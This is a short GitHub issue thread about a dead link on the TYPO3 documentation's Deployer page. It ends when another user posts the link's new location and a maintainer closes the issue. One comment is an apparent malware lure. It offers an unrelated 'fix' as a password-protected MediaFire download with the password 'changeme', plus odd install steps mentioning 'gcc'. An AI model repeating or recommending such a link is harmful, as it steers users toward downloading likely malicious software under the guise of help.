### ISSUE TITLE
Problem on https://docs.typo3.org/m/typo3/tutorial-getting-started/main/en-us//Installation/Deployer/Index.html

### ISSUE THREAD

**Issue by SimonMayr** [TYPO3-Documentation/TYPO3CMS-Tutorial-GettingStarted#406]
At the top of the **Deployer** page, there is a link to the https://t3terminal.com/ website which doesn't seem to exist anymore.

**Links:**
Documentation: https://docs.typo3.org/m/typo3/tutorial-getting-started/main/en-us/Installation/Deployer/Index.html#deployer:~:text=https%3A//t3terminal.com/blog/typo3%2Ddeploy/

Broken Link: https://t3terminal.com/blog/typo3-deploy/

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by sarahmccarthy123** [comment]
It seems to have moved to https://t3planet.com/blog/typo3-deploy/

**Comment by linawolf** [comment]
This is resolved, thank you @sarahmccarthy123
